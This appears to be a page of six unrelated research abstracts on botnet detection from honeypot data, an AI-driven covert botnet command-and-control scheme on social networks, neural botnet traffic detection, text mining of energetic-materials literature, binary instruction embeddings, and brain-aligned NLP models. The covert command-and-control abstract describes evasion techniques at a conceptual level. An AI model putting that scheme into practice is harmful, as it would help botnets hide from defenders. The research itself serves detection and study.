No Arabic abstract
Computer security has been plagued by increasing formidable, dynamic, hard-to-detect, hard-to-predict, and hard-to-characterize hacking techniques. Such techniques are very often deployed in self-propagating worms capable of automatically infecting vulnerable computer systems and then building large bot networks, which are then used to launch coordinated attacks on designated targets. In this work, we investigate novel applications of Natural Language Processing (NLP) methods to detect and correlate botnet behaviors through the analysis of honeypot data. In our approach we take observed behaviors in shell commands issued by intruders during captured internet sessions and reduce them to collections of stochastic processes that are, in turn, processed with machine learning techniques to build classifiers and predictors. Our technique results in a new ability to cluster botnet source IP address even in the face of their desire to obfuscate their penetration attempts through rapid or random permutation techniques.
Command and control (C&C) is the essential component of a botnet. In previous C&C using online social networks (OSNs), the botmasters identifiers are reversible. After a bot is analyzed, the botmasters accounts can be predicted in advance. Additionally, abnormal content from explicit commands may expose botmasters and raise anomalies on OSNs. To overcome these deficiencies, we proposed DeepC2, an AI-powered covert C&C method on OSNs. By leveraging neural networks, bots can find botmasters by avatars, which are converted into feature vectors and built into bots. Defenders cannot predict the botmasters accounts from the vectors in advance. Commands are embedded into normal contents (e.g., tweets and comments) using easy data augmentation and hash collision. Experiments on Twitter show that command-embedded contents can be generated efficiently, and bots can find botmasters and obtain commands accurately. Security analysis on different scenarios show that it is hard to predict the botmasters avatars. By demonstrating how AI may help promote covert communication on OSNs, this work provides a new perspective on botnet detection and confrontation.
Botnets are increasingly used by malicious actors, creating increasing threat to a large number of internet users. To address this growing danger, we propose to study methods to detect botnets, especially those that are hard to capture with the commonly used methods, such as the signature based ones and the existing anomaly-based ones. More specifically, we propose a novel machine learning based method, named Recurrent Variational Autoencoder (RVAE), for detecting botnets through sequential characteristics of network traffic flow data including attacks by botnets. We validate robustness of our method with the CTU-13 dataset, where we have chosen the testing dataset to have different types of botnets than those of training dataset. Tests show that RVAE is able to detect botnets with the same accuracy as the best known results published in literature. In addition, we propose an approach to assign anomaly score based on probability distributions, which allows us to detect botnets in streaming mode as the new networking statistics becomes available. This on-line detection capability would enable real-time detection of unknown botnets.
The number of scientific journal articles and reports being published about energetic materials every year is growing exponentially, and therefore extracting relevant information and actionable insights from the latest research is becoming a considerable challenge. In this work we explore how techniques from natural language processing and machine learning can be used to automatically extract chemical insights from large collections of documents. We first describe how to download and process documents from a variety of sources - journal articles, conference proceedings (including NTREM), the US Patent & Trademark Office, and the Defense Technical Information Center archive on archive.org. We present a custom NLP pipeline which uses open source NLP tools to identify the names of chemical compounds and relates them to function words (underwater, rocket, pyrotechnic) and property words (elastomer, non-toxic). After explaining how word embeddings work we compare the utility of two popular word embeddings - word2vec and GloVe. Chemical-chemical and chemical-application relationships are obtained by doing computations with word vectors. We show that word embeddings capture latent information about energetic materials, so that related materials appear close together in the word embedding space.
Given a closed-source program, such as most of proprietary software and viruses, binary code analysis is indispensable for many tasks, such as code plagiarism detection and malware analysis. Today, source code is very often compiled for various architectures, making cross-architecture binary code analysis increasingly important. A binary, after being disassembled, is expressed in an assembly languages. Thus, recent work starts exploring Natural Language Processing (NLP) inspired binary code analysis. In NLP, words are usually represented in high-dimensional vectors (i.e., embeddings) to facilitate further processing, which is one of the most common and critical steps in many NLP tasks. We regard instructions as words in NLP-inspired binary code analysis, and aim to represent instructions as embeddings as well. To facilitate cross-architecture binary code analysis, our goal is that similar instructions, regardless of their architectures, have embeddings close to each other. To this end, we propose a joint learning approach to generating instruction embeddings that capture not only the semantics of instructions within an architecture, but also their semantic relationships across architectures. To the best of our knowledge, this is the first work on building cross-architecture instruction embedding model. As a showcase, we apply the model to resolving one of the most fundamental problems for binary code similarity comparison---semantics-based basic block comparison, and the solution outperforms the code statistics based approach. It demonstrates that it is promising to apply the model to other cross-architecture binary code analysis tasks.
Neural networks models for NLP are typically implemented without the explicit encoding of language rules and yet they are able to break one performance record after another. This has generated a lot of research interest in interpreting the representations learned by these networks. We propose here a novel interpretation approach that relies on the only processing system we have that does understand language: the human brain. We use brain imaging recordings of subjects reading complex natural text to interpret word and sequence embeddings from 4 recent NLP models - ELMo, USE, BERT and Transformer-XL. We study how their representations differ across layer depth, context length, and attention type. Our results reveal differences in the context-related representations across these models. Further, in the transformer models, we find an interaction between layer depth and context length, and between layer depth and attention type. We finally hypothesize that altering BERT to better align with brain recordings would enable it to also better understand language. Probing the altered BERT using syntactic NLP tasks reveals that the model with increased brain-alignment outperforms the original model. Cognitive neuroscientists have already begun using NLP networks to study the brain, and this work closes the loop to allow the interaction between NLP and cognitive neuroscience to be a true cross-pollination.